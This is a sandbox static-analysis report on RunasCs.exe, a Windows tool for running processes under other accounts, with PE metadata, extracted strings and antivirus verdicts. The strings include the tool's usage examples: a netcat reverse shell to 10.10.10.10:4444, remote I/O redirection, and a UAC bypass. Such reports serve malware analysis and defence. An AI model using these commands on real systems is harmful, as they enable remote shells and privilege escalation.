Static | ZeroBOX

PE Compile Time

2102-07-31 05:36:05

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x0000bed8 | 0x0000c000 | 5.4140105447 |
| .rsrc | 0x0000e000 | 0x0000059c | 0x00000600 | 4.04183063173 |
| .reloc | 0x00010000 | 0x0000000c | 0x00000200 | 0.0815394123432 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x0000e090 | 0x0000030c | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0000e3ac | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
RunasCs v1.5 - @splinter_code
Usage:
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]
Description:
RunasCs is an utility to run specific processes under a different user account
by specifying explicit credentials. In contrast to the default runas.exe command
it supports different logon types and CreateProcess* functions to be used, depending
on your current permissions. Furthermore it allows input/output redirection (even
to remote hosts) and you can specify the password directly on the command line.
Positional arguments:
username username of the user
password password of the user
cmd commandline for the process
Optional arguments:
-d, --domain domain
domain of the user, if in a domain.
Default: ""
-f, --function create_process_function
CreateProcess function to use. When not specified
RunasCs determines an appropriate CreateProcess
function automatically according to your privileges.
0 - CreateProcessAsUserW
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-l, --logon-type logon_type
the logon type for the token of the new process.
Default: "2" - Interactive
-t, --timeout process_timeout
the waiting time (in ms) for the created process.
This will halt RunasCs until the spawned process
ends and sent the output back to the caller.
If you set 0 no output will be retrieved and a
background process will be created.
Default: "120000"
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process_timeout to 0.
-p, --force-profile
force the creation of the user profile on the machine.
This will ensure the process will have the
environment variables correctly set.
WARNING: If non-existent, it creates the user profile
directory in the C:\Users folder.
-b, --bypass-uac
try a UAC bypass to spawn a process without
token limitations (not filtered).
-i, --remote-impersonation
spawn a new process and assign the token of the
logged on user to the main thread.
Examples:
Run a command as a local user
RunasCs.exe user1 password1 "cmd /c whoami /all"
Run a command as a domain user and logon type as NetworkCleartext (8)
RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
Run a background process as a local user,
RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
Redirect stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
Run a command as an Administrator bypassing UAC
RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
Run a command as an Administrator through remote impersonation
RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation
VS_VERSION_INFO

VarFileInfo / Translation
StringFileInfo (000004b0)
Comments:
CompanyName:
FileDescription: RunasCs
FileVersion: 1.0.0.0
InternalName: RunasCs.exe
LegalCopyright: Copyright 2022
LegalTrademarks:
OriginalFilename: RunasCs.exe
ProductName: RunasCs
ProductVersion: 1.0.0.0
Assembly Version: 1.0.0.0

| Antivirus | Signature |
|---|---|
| Bkav | W32.AIDetectMalware.CS |
| Lionic | Trojan.Win32.Dacic.4!c |
| Elastic | malicious (high confidence) |
| ClamAV | Clean |
| CMC | Clean |
| CAT-QuickHeal | Clean |
| Skyhigh | Artemis!Trojan |
| ALYac | Generic.Dacic.1307.659B7924 |
| Cylance | Clean |
| Zillya | Tool.RunasCs.Win32.28 |
| Sangfor | Riskware.Win32.Runascs.Vk6g |
| K7AntiVirus | Riskware ( 005aef071 ) |
| Alibaba | RiskWare:MSIL/RunasCs.01afc3d8 |
| K7GW | Riskware ( 005aef071 ) |
| Cybereason | malicious.a60faa |
| Baidu | Clean |
| VirIT | Clean |
| Paloalto | generic.ml |
| Symantec | ML.Attribute.HighConfidence |
| tehtris | Generic.Malware |
| ESET-NOD32 | a variant of MSIL/Riskware.RunasCs.D |
| APEX | Clean |
| Avast | Win32:Malware-gen |
| Cynet | Clean |
| Kaspersky | UDS:DangerousObject.Multi.Generic |
| BitDefender | Generic.Dacic.1307.659B7924 |
| NANO-Antivirus | Clean |
| ViRobot | Clean |
| MicroWorld-eScan | Generic.Dacic.1307.659B7924 |
| TACHYON | Clean |
| Sophos | Mal/Generic-S |
| F-Secure | Clean |
| DrWeb | Clean |
| VIPRE | Generic.Dacic.1307.659B7924 |
| TrendMicro | Clean |
| McAfeeD | ti!29955BA1E219 |
| Trapmine | Clean |
| FireEye | Generic.Dacic.1307.659B7924 |
| Emsisoft | Generic.Dacic.1307.659B7924 (B) |
| SentinelOne | Static AI - Malicious PE |
| GData | Generic.Dacic.1307.659B7924 |
| Jiangmin | Clean |
| Webroot | Clean |
| Varist | W32/ABRisk.SYBB-7020 |
| Avira | Clean |
| Antiy-AVL | Trojan/Win32.SGeneric |
| Kingsoft | Win32.Troj.Unknown.a |
| Gridinsoft | Clean |
| Xcitium | Clean |
| Arcabit | Generic.Dacic.1307.659B7924 |
| SUPERAntiSpyware | Clean |
| ZoneAlarm | UDS:DangerousObject.Multi.Generic |
| Microsoft | Trojan:Win32/Casdet!rfn |
| Google | Detected |
| AhnLab-V3 | Clean |
| Acronis | Clean |
| McAfee | Artemis!ED04F33A60FA |
| MAX | malware (ai score=80) |
| VBA32 | Clean |
| Malwarebytes | RiskWare.Agent |
| Panda | Trj/Chgt.AD |
| Zoner | Clean |
| TrendMicro-HouseCall | TROJ_GEN.R002H07AP24 |
| Tencent | Clean |
| Yandex | Clean |
| Ikarus | PUA.Generic |
| MaxSecure | Trojan.Malware.208584019.susgen |
| Fortinet | PossibleThreat |
| BitDefenderTheta | Gen:NN.ZemsilF.36806.dm0@aOK2Fo |
| AVG | Win32:Malware-gen |
| DeepInstinct | MALICIOUS |
| alibabacloud | RiskWare:MSIL/RunasCs.D |

No IRMA results available.